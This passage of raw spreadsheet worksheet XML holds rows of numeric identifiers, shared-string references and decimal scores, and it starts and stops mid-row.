      <c r="E28551" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28551" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="28552" ht="15.75" customHeight="1">
      <c r="A28552" s="1">
        <v>11187.0</v>
      </c>
      <c r="B28552" s="2">
        <v>1.9788438E7</v>
      </c>
      <c r="C28552" s="2" t="s">
        <v>27441</v>
      </c>
      <c r="D28552" s="2">
        <v>1.0</v>
      </c>
      <c r="E28552" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28552" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="28553" ht="15.75" customHeight="1">
      <c r="A28553" s="1">
        <v>11292.0</v>
      </c>
      <c r="B28553" s="2">
        <v>2.0920708E7</v>
      </c>
      <c r="C28553" s="2" t="s">
        <v>27442</v>
      </c>
      <c r="D28553" s="2">
        <v>1.0</v>
      </c>
      <c r="E28553" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28553" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="28554" ht="15.75" customHeight="1">
      <c r="A28554" s="1">
        <v>12886.0</v>
      </c>
      <c r="B28554" s="2">
        <v>3.2023406E7</v>
      </c>
      <c r="C28554" s="2" t="s">
        <v>27443</v>
      </c>
      <c r="D28554" s="2">
        <v>1.0</v>
      </c>
      <c r="E28554" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28554" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="28555" ht="15.75" customHeight="1">
      <c r="A28555" s="1">
        <v>13744.0</v>
      </c>
      <c r="B28555" s="2">
        <v>3.6456329E7</v>
      </c>
      <c r="C28555" s="2" t="s">
        <v>27444</v>
      </c>
      <c r="D28555" s="2">
        <v>1.0</v>
      </c>
      <c r="E28555" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28555" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="28556" ht="15.75" customHeight="1">
      <c r="A28556" s="1">
        <v>18924.0</v>
      </c>
      <c r="B28556" s="2">
        <v>5.4244049E7</v>
      </c>
      <c r="C28556" s="2" t="s">
        <v>27445</v>
      </c>
      <c r="D28556" s="2">
        <v>1.0</v>
      </c>
      <c r="E28556" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28556" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="28557" ht="15.75" customHeight="1">
      <c r="A28557" s="1">
        <v>19630.0</v>
      </c>
      <c r="B28557" s="2">
        <v>5.6278179E7</v>
      </c>
      <c r="C28557" s="2" t="s">
        <v>27446</v>
      </c>
      <c r="D28557" s="2">
        <v>1.0</v>
      </c>
      <c r="E28557" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28557" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="28558" ht="15.75" customHeight="1">
      <c r="A28558" s="1">
        <v>12781.0</v>
      </c>
      <c r="B28558" s="2">
        <v>3.1354143E7</v>
      </c>
      <c r="C28558" s="2" t="s">
        <v>27447</v>
      </c>
      <c r="D28558" s="2">
        <v>1.0</v>
      </c>
      <c r="E28558" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28558" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="28559" ht="15.75" customHeight="1">
      <c r="A28559" s="1">
        <v>13760.0</v>
      </c>
      <c r="B28559" s="2">
        <v>3.650645E7</v>
      </c>
      <c r="C28559" s="2" t="s">
        <v>27448</v>
      </c>
      <c r="D28559" s="2">
        <v>1.0</v>
      </c>
      <c r="E28559" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28559" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="28560" ht="15.75" customHeight="1">
      <c r="A28560" s="1">
        <v>19935.0</v>
      </c>
      <c r="B28560" s="2">
        <v>5.7445996E7</v>
      </c>
      <c r="C28560" s="2" t="s">
        <v>27449</v>
      </c>
      <c r="D28560" s="2">
        <v>1.0</v>
      </c>
      <c r="E28560" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28560" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="28561" ht="15.75" customHeight="1">
      <c r="A28561" s="1">
        <v>26635.0</v>
      </c>
      <c r="B28561" s="2">
        <v>1.8043994E7</v>
      </c>
      <c r="C28561" s="2" t="s">
        <v>27450</v>
      </c>
      <c r="D28561" s="2">
        <v>1.0</v>
      </c>
      <c r="E28561" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28561" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="28562" ht="15.75" customHeight="1">
      <c r="A28562" s="1">
        <v>30964.0</v>
      </c>
      <c r="B28562" s="2">
        <v>4.7450665E7</v>
      </c>
      <c r="C28562" s="2" t="s">
        <v>27212</v>
      </c>
      <c r="D28562" s="2">
        <v>1.0</v>
      </c>
      <c r="E28562" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28562" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="28563" ht="15.75" customHeight="1">
      <c r="A28563" s="1">
        <v>31440.0</v>
      </c>
      <c r="B28563" s="2">
        <v>5018574.0</v>
      </c>
      <c r="C28563" s="2" t="s">
        <v>27212</v>
      </c>
      <c r="D28563" s="2">
        <v>1.0</v>
      </c>
      <c r="E28563" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28563" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="28564" ht="15.75" customHeight="1">
      <c r="A28564" s="1">
        <v>33332.0</v>
      </c>
      <c r="B28564" s="2">
        <v>7584721.0</v>
      </c>
      <c r="C28564" s="2" t="s">
        <v>27451</v>
      </c>
      <c r="D28564" s="2">
        <v>1.0</v>
      </c>
      <c r="E28564" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28564" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="28565" ht="15.75" customHeight="1">
      <c r="A28565" s="1">
        <v>34079.0</v>
      </c>
      <c r="B28565" s="2">
        <v>9671698.0</v>
      </c>
      <c r="C28565" s="2" t="s">
        <v>27452</v>
      </c>
      <c r="D28565" s="2">
        <v>1.0</v>
      </c>
      <c r="E28565" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28565" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="28566" ht="15.75" customHeight="1">
      <c r="A28566" s="1">
        <v>5261.0</v>
      </c>
      <c r="B28566" s="2">
        <v>4.5113885E7</v>
      </c>
      <c r="C28566" s="2" t="s">
        <v>27453</v>
      </c>
      <c r="D28566" s="2">
        <v>1.0</v>
      </c>
      <c r="E28566" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28566" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="28567" ht="15.75" customHeight="1">
      <c r="A28567" s="1">
        <v>8532.0</v>
      </c>
      <c r="B28567" s="2">
        <v>5.4104697E7</v>
      </c>
      <c r="C28567" s="2" t="s">
        <v>27454</v>
      </c>
      <c r="D28567" s="2">
        <v>1.0</v>
      </c>
      <c r="E28567" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28567" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="28568" ht="15.75" customHeight="1">
      <c r="A28568" s="1">
        <v>13026.0</v>
      </c>
      <c r="B28568" s="2">
        <v>3.2944988E7</v>
      </c>
      <c r="C28568" s="2" t="s">
        <v>27455</v>
      </c>
      <c r="D28568" s="2">
        <v>1.0</v>
      </c>
      <c r="E28568" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28568" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="28569" ht="15.75" customHeight="1">
      <c r="A28569" s="1">
        <v>14720.0</v>
      </c>
      <c r="B28569" s="2">
        <v>4.0634334E7</v>
      </c>
      <c r="C28569" s="2" t="s">
        <v>27456</v>
      </c>
      <c r="D28569" s="2">
        <v>1.0</v>
      </c>
      <c r="E28569" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28569" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="28570" ht="15.75" customHeight="1">
      <c r="A28570" s="1">
        <v>25918.0</v>
      </c>
      <c r="B28570" s="2">
        <v>1.5156106E7</v>
      </c>
      <c r="C28570" s="2" t="s">
        <v>27457</v>
      </c>
      <c r="D28570" s="2">
        <v>1.0</v>
      </c>
      <c r="E28570" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28570" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="28571" ht="15.75" customHeight="1">
      <c r="A28571" s="1">
        <v>33967.0</v>
      </c>
      <c r="B28571" s="2">
        <v>9356195.0</v>
      </c>
      <c r="C28571" s="2" t="s">
        <v>27458</v>
      </c>
      <c r="D28571" s="2">
        <v>1.0</v>
      </c>
      <c r="E28571" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28571" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="28572" ht="15.75" customHeight="1">
      <c r="A28572" s="1">
        <v>6109.0</v>
      </c>
      <c r="B28572" s="2">
        <v>4.773677E7</v>
      </c>
      <c r="C28572" s="2" t="s">
        <v>27459</v>
      </c>
      <c r="D28572" s="2">
        <v>1.0</v>
      </c>
      <c r="E28572" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28572" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="28573" ht="15.75" customHeight="1">
      <c r="A28573" s="1">
        <v>29263.0</v>
      </c>
      <c r="B28573" s="2">
        <v>3.0990373E7</v>
      </c>
      <c r="C28573" s="2" t="s">
        <v>27460</v>
      </c>
      <c r="D28573" s="2">
        <v>1.0</v>
      </c>
      <c r="E28573" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28573" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="28574" ht="15.75" customHeight="1">
      <c r="A28574" s="1">
        <v>1045.0</v>
      </c>
      <c r="B28574" s="2">
        <v>2.3342699E7</v>
      </c>
      <c r="C28574" s="2" t="s">
        <v>27461</v>
      </c>
      <c r="D28574" s="2">
        <v>1.0</v>
      </c>
      <c r="E28574" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28574" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="28575" ht="15.75" customHeight="1">
      <c r="A28575" s="1">
        <v>9932.0</v>
      </c>
      <c r="B28575" s="2">
        <v>5.6832868E7</v>
      </c>
      <c r="C28575" s="2" t="s">
        <v>27462</v>
      </c>
      <c r="D28575" s="2">
        <v>1.0</v>
      </c>
      <c r="E28575" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28575" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="28576" ht="15.75" customHeight="1">
      <c r="A28576" s="1">
        <v>19147.0</v>
      </c>
      <c r="B28576" s="2">
        <v>5.4839127E7</v>
      </c>
      <c r="C28576" s="2" t="s">
        <v>27463</v>
      </c>
      <c r="D28576" s="2">
        <v>1.0</v>
      </c>
      <c r="E28576" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28576" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="28577" ht="15.75" customHeight="1">
      <c r="A28577" s="1">
        <v>21757.0</v>
      </c>
      <c r="B28577" s="2">
        <v>2.6095609E7</v>
      </c>
      <c r="C28577" s="2" t="s">
        <v>27464</v>
      </c>
      <c r="D28577" s="2">
        <v>1.0</v>
      </c>
      <c r="E28577" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28577" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="28578" ht="15.75" customHeight="1">
      <c r="A28578" s="1">
        <v>24493.0</v>
      </c>
      <c r="B28578" s="2">
        <v>1.1089965E7</v>
      </c>
      <c r="C28578" s="2" t="s">
        <v>27465</v>
      </c>
      <c r="D28578" s="2">
        <v>1.0</v>
      </c>
      <c r="E28578" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28578" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="28579" ht="15.75" customHeight="1">
      <c r="A28579" s="1">
        <v>34117.0</v>
      </c>
      <c r="B28579" s="2">
        <v>9765648.0</v>
      </c>
      <c r="C28579" s="2" t="s">
        <v>27466</v>
      </c>
      <c r="D28579" s="2">
        <v>1.0</v>
      </c>
      <c r="E28579" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28579" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="28580" ht="15.75" customHeight="1">
      <c r="A28580" s="1">
        <v>5315.0</v>
      </c>
      <c r="B28580" s="2">
        <v>4.5279096E7</v>
      </c>
      <c r="C28580" s="2" t="s">
        <v>27467</v>
      </c>
      <c r="D28580" s="2">
        <v>1.0</v>
      </c>
      <c r="E28580" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28580" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="28581" ht="15.75" customHeight="1">
      <c r="A28581" s="1">
        <v>14101.0</v>
      </c>
      <c r="B28581" s="2">
        <v>3.7749956E7</v>
      </c>
      <c r="C28581" s="2" t="s">
        <v>27468</v>
      </c>
      <c r="D28581" s="2">
        <v>1.0</v>
      </c>
      <c r="E28581" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28581" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="28582" ht="15.75" customHeight="1">
      <c r="A28582" s="1">
        <v>23778.0</v>
      </c>
      <c r="B28582" s="2">
        <v>7607858.0</v>
      </c>
      <c r="C28582" s="2" t="s">
        <v>27469</v>
      </c>
      <c r="D28582" s="2">
        <v>1.0</v>
      </c>
      <c r="E28582" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28582" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="28583" ht="15.75" customHeight="1">
      <c r="A28583" s="1">
        <v>26562.0</v>
      </c>
      <c r="B28583" s="2">
        <v>1.7820367E7</v>
      </c>
      <c r="C28583" s="2" t="s">
        <v>27470</v>
      </c>
      <c r="D28583" s="2">
        <v>1.0</v>
      </c>
      <c r="E28583" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28583" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="28584" ht="15.75" customHeight="1">
      <c r="A28584" s="1">
        <v>28203.0</v>
      </c>
      <c r="B28584" s="2">
        <v>2.5016994E7</v>
      </c>
      <c r="C28584" s="2" t="s">
        <v>27471</v>
      </c>
      <c r="D28584" s="2">
        <v>1.0</v>
      </c>
      <c r="E28584" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28584" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="28585" ht="15.75" customHeight="1">
      <c r="A28585" s="1">
        <v>33350.0</v>
      </c>
      <c r="B28585" s="2">
        <v>7607857.0</v>
      </c>
      <c r="C28585" s="2" t="s">
        <v>27469</v>
      </c>
      <c r="D28585" s="2">
        <v>1.0</v>
      </c>
      <c r="E28585" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28585" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="28586" ht="15.75" customHeight="1">
      <c r="A28586" s="1">
        <v>33686.0</v>
      </c>
      <c r="B28586" s="2">
        <v>8445054.0</v>
      </c>
      <c r="C28586" s="2" t="s">
        <v>27472</v>
      </c>
      <c r="D28586" s="2">
        <v>1.0</v>
      </c>
      <c r="E28586" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28586" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="28587" ht="15.75" customHeight="1">
      <c r="A28587" s="1">
        <v>13398.0</v>
      </c>
      <c r="B28587" s="2">
        <v>3.4984681E7</v>
      </c>
      <c r="C28587" s="2" t="s">
        <v>27473</v>
      </c>
      <c r="D28587" s="2">
        <v>1.0</v>
      </c>
      <c r="E28587" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28587" s="2">
        <v>0.1155202821869489</v>
      </c>
    </row>
    <row r="28588" ht="15.75" customHeight="1">
      <c r="A28588" s="1">
        <v>15547.0</v>
      </c>
      <c r="B28588" s="2">
        <v>4.3397458E7</v>
      </c>
      <c r="C28588" s="2" t="s">
        <v>27474</v>
      </c>
      <c r="D28588" s="2">
        <v>1.0</v>
      </c>
      <c r="E28588" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28588" s="2">
        <v>0.1154513888888889</v>
      </c>
    </row>
    <row r="28589" ht="15.75" customHeight="1">
      <c r="A28589" s="1">
        <v>28148.0</v>
      </c>
      <c r="B28589" s="2">
        <v>2.4824437E7</v>
      </c>
      <c r="C28589" s="2" t="s">
        <v>27475</v>
      </c>
      <c r="D28589" s="2">
        <v>1.0</v>
      </c>
      <c r="E28589" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28589" s="2">
        <v>0.1154513888888889</v>
      </c>
    </row>
    <row r="28590" ht="15.75" customHeight="1">
      <c r="A28590" s="1">
        <v>4897.0</v>
      </c>
      <c r="B28590" s="2">
        <v>4.3898529E7</v>
      </c>
      <c r="C28590" s="2" t="s">
        <v>27476</v>
      </c>
      <c r="D28590" s="2">
        <v>1.0</v>
      </c>
      <c r="E28590" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28590" s="2">
        <v>0.115257048092869</v>
      </c>
    </row>
    <row r="28591" ht="15.75" customHeight="1">
      <c r="A28591" s="1">
        <v>15729.0</v>
      </c>
      <c r="B28591" s="2">
        <v>4.4049258E7</v>
      </c>
      <c r="C28591" s="2" t="s">
        <v>27477</v>
      </c>
      <c r="D28591" s="2">
        <v>1.0</v>
      </c>
      <c r="E28591" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28591" s="2">
        <v>0.1151368760064412</v>
      </c>
    </row>
    <row r="28592" ht="15.75" customHeight="1">
      <c r="A28592" s="1">
        <v>13274.0</v>
      </c>
      <c r="B28592" s="2">
        <v>3.4392058E7</v>
      </c>
      <c r="C28592" s="2" t="s">
        <v>27478</v>
      </c>
      <c r="D28592" s="2">
        <v>1.0</v>
      </c>
      <c r="E28592" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28592" s="2">
        <v>0.1150793650793651</v>
      </c>
    </row>
    <row r="28593" ht="15.75" customHeight="1">
      <c r="A28593" s="1">
        <v>2889.0</v>
      </c>
      <c r="B28593" s="2">
        <v>3.5710092E7</v>
      </c>
      <c r="C28593" s="2" t="s">
        <v>27479</v>
      </c>
      <c r="D28593" s="2">
        <v>1.0</v>
      </c>
      <c r="E28593" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28593" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="28594" ht="15.75" customHeight="1">
      <c r="A28594" s="1">
        <v>6969.0</v>
      </c>
      <c r="B28594" s="2">
        <v>4.9989331E7</v>
      </c>
      <c r="C28594" s="2" t="s">
        <v>27480</v>
      </c>
      <c r="D28594" s="2">
        <v>1.0</v>
      </c>
      <c r="E28594" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28594" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="28595" ht="15.75" customHeight="1">
      <c r="A28595" s="1">
        <v>12005.0</v>
      </c>
      <c r="B28595" s="2">
        <v>2.5964347E7</v>
      </c>
      <c r="C28595" s="2" t="s">
        <v>27481</v>
      </c>
      <c r="D28595" s="2">
        <v>1.0</v>
      </c>
      <c r="E28595" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28595" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="28596" ht="15.75" customHeight="1">
      <c r="A28596" s="1">
        <v>14253.0</v>
      </c>
      <c r="B28596" s="2">
        <v>3.8383758E7</v>
      </c>
      <c r="C28596" s="2" t="s">
        <v>27482</v>
      </c>
      <c r="D28596" s="2">
        <v>1.0</v>
      </c>
      <c r="E28596" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28596" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="28597" ht="15.75" customHeight="1">
      <c r="A28597" s="1">
        <v>21726.0</v>
      </c>
      <c r="B28597" s="2">
        <v>2.5678869E7</v>
      </c>
      <c r="C28597" s="2" t="s">
        <v>27483</v>
      </c>
      <c r="D28597" s="2">
        <v>1.0</v>
      </c>
      <c r="E28597" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28597" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="28598" ht="15.75" customHeight="1">
      <c r="A28598" s="1">
        <v>5327.0</v>
      </c>
      <c r="B28598" s="2">
        <v>4.5297871E7</v>
      </c>
      <c r="C28598" s="2" t="s">
        <v>27484</v>
      </c>
      <c r="D28598" s="2">
        <v>1.0</v>
      </c>
      <c r="E28598" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28598" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="28599" ht="15.75" customHeight="1">
      <c r="A28599" s="1">
        <v>8209.0</v>
      </c>
      <c r="B28599" s="2">
        <v>5.3309627E7</v>
      </c>
      <c r="C28599" s="2" t="s">
        <v>27485</v>
      </c>
      <c r="D28599" s="2">
        <v>1.0</v>
      </c>
      <c r="E28599" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28599" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="28600" ht="15.75" customHeight="1">
      <c r="A28600" s="1">
        <v>10364.0</v>
      </c>
      <c r="B28600" s="2">
        <v>7803416.0</v>
      </c>
      <c r="C28600" s="2" t="s">
        <v>27486</v>
      </c>
      <c r="D28600" s="2">
        <v>1.0</v>
      </c>
      <c r="E28600" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28600" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="28601" ht="15.75" customHeight="1">
      <c r="A28601" s="1">
        <v>19339.0</v>
      </c>
      <c r="B28601" s="2">
        <v>5.5353258E7</v>
      </c>
      <c r="C28601" s="2" t="s">
        <v>27487</v>
      </c>
      <c r="D28601" s="2">
        <v>1.0</v>
      </c>
      <c r="E28601" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28601" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="28602" ht="15.75" customHeight="1">
      <c r="A28602" s="1">
        <v>20743.0</v>
      </c>
      <c r="B28602" s="2">
        <v>1.4778785E7</v>
      </c>
      <c r="C28602" s="2" t="s">
        <v>27488</v>
      </c>
      <c r="D28602" s="2">
        <v>1.0</v>
      </c>
      <c r="E28602" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28602" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="28603" ht="15.75" customHeight="1">
      <c r="A28603" s="1">
        <v>21399.0</v>
      </c>
      <c r="B28603" s="2">
        <v>2.1813001E7</v>
      </c>
      <c r="C28603" s="2" t="s">
        <v>27489</v>
      </c>
      <c r="D28603" s="2">
        <v>1.0</v>
      </c>
      <c r="E28603" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28603" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="28604" ht="15.75" customHeight="1">
      <c r="A28604" s="1">
        <v>29443.0</v>
      </c>
      <c r="B28604" s="2">
        <v>3.222131E7</v>
      </c>
      <c r="C28604" s="2" t="s">
        <v>27490</v>
      </c>
      <c r="D28604" s="2">
        <v>1.0</v>
      </c>
      <c r="E28604" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28604" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="28605" ht="15.75" customHeight="1">
      <c r="A28605" s="1">
        <v>31374.0</v>
      </c>
      <c r="B28605" s="2">
        <v>4.9939772E7</v>
      </c>
      <c r="C28605" s="2" t="s">
        <v>27491</v>
      </c>
      <c r="D28605" s="2">
        <v>1.0</v>
      </c>
      <c r="E28605" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28605" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="28606" ht="15.75" customHeight="1">
      <c r="A28606" s="1">
        <v>32896.0</v>
      </c>
      <c r="B28606" s="2">
        <v>6395358.0</v>
      </c>
      <c r="C28606" s="2" t="s">
        <v>27492</v>
      </c>
      <c r="D28606" s="2">
        <v>1.0</v>
      </c>
      <c r="E28606" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28606" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="28607" ht="15.75" customHeight="1">
      <c r="A28607" s="1">
        <v>33863.0</v>
      </c>
      <c r="B28607" s="2">
        <v>9061791.0</v>
      </c>
      <c r="C28607" s="2" t="s">
        <v>27493</v>
      </c>
      <c r="D28607" s="2">
        <v>1.0</v>
      </c>
      <c r="E28607" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28607" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="28608" ht="15.75" customHeight="1">
      <c r="A28608" s="1">
        <v>33883.0</v>
      </c>
      <c r="B28608" s="2">
        <v>9125546.0</v>
      </c>
      <c r="C28608" s="2" t="s">
        <v>27494</v>
      </c>
      <c r="D28608" s="2">
        <v>1.0</v>
      </c>
      <c r="E28608" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28608" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="28609" ht="15.75" customHeight="1">
      <c r="A28609" s="1">
        <v>102.0</v>
      </c>
      <c r="B28609" s="2">
        <v>1.2682429E7</v>
      </c>
      <c r="C28609" s="2" t="s">
        <v>27495</v>
      </c>
      <c r="D28609" s="2">
        <v>1.0</v>
      </c>
      <c r="E28609" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28609" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28610" ht="15.75" customHeight="1">
      <c r="A28610" s="1">
        <v>701.0</v>
      </c>
      <c r="B28610" s="2">
        <v>2.0461108E7</v>
      </c>
      <c r="C28610" s="2" t="s">
        <v>27496</v>
      </c>
      <c r="D28610" s="2">
        <v>1.0</v>
      </c>
      <c r="E28610" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28610" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28611" ht="15.75" customHeight="1">
      <c r="A28611" s="1">
        <v>734.0</v>
      </c>
      <c r="B28611" s="2">
        <v>2.0804293E7</v>
      </c>
      <c r="C28611" s="2" t="s">
        <v>27497</v>
      </c>
      <c r="D28611" s="2">
        <v>1.0</v>
      </c>
      <c r="E28611" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28611" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28612" ht="15.75" customHeight="1">
      <c r="A28612" s="1">
        <v>805.0</v>
      </c>
      <c r="B28612" s="2">
        <v>2.1290374E7</v>
      </c>
      <c r="C28612" s="2" t="s">
        <v>27498</v>
      </c>
      <c r="D28612" s="2">
        <v>1.0</v>
      </c>
      <c r="E28612" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28612" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28613" ht="15.75" customHeight="1">
      <c r="A28613" s="1">
        <v>2455.0</v>
      </c>
      <c r="B28613" s="2">
        <v>3.3715641E7</v>
      </c>
      <c r="C28613" s="2" t="s">
        <v>27499</v>
      </c>
      <c r="D28613" s="2">
        <v>1.0</v>
      </c>
      <c r="E28613" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28613" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28614" ht="15.75" customHeight="1">
      <c r="A28614" s="1">
        <v>2604.0</v>
      </c>
      <c r="B28614" s="2">
        <v>3.4404351E7</v>
      </c>
      <c r="C28614" s="2" t="s">
        <v>27500</v>
      </c>
      <c r="D28614" s="2">
        <v>1.0</v>
      </c>
      <c r="E28614" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28614" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28615" ht="15.75" customHeight="1">
      <c r="A28615" s="1">
        <v>5338.0</v>
      </c>
      <c r="B28615" s="2">
        <v>4.5330182E7</v>
      </c>
      <c r="C28615" s="2" t="s">
        <v>27501</v>
      </c>
      <c r="D28615" s="2">
        <v>1.0</v>
      </c>
      <c r="E28615" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28615" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28616" ht="15.75" customHeight="1">
      <c r="A28616" s="1">
        <v>5554.0</v>
      </c>
      <c r="B28616" s="2">
        <v>4.5965942E7</v>
      </c>
      <c r="C28616" s="2" t="s">
        <v>27502</v>
      </c>
      <c r="D28616" s="2">
        <v>1.0</v>
      </c>
      <c r="E28616" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28616" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28617" ht="15.75" customHeight="1">
      <c r="A28617" s="1">
        <v>6456.0</v>
      </c>
      <c r="B28617" s="2">
        <v>4.8611517E7</v>
      </c>
      <c r="C28617" s="2" t="s">
        <v>27503</v>
      </c>
      <c r="D28617" s="2">
        <v>1.0</v>
      </c>
      <c r="E28617" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28617" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="28618" ht="15.75" customHeight="1">
      <c r="A28618" s="1">
        <v>7328.0</v>
      </c>
      <c r="B28618" s="2">
        <v>5.0905338E7</v>
      </c>
      <c r="C28618" s="2" t="s">
        <v>27504</v>
      </c>
      <c r="D28618" s="2">
        <v>1.0</v>
      </c>
      <c r="E28618" s="3" t="s">
        <v>26559</v>
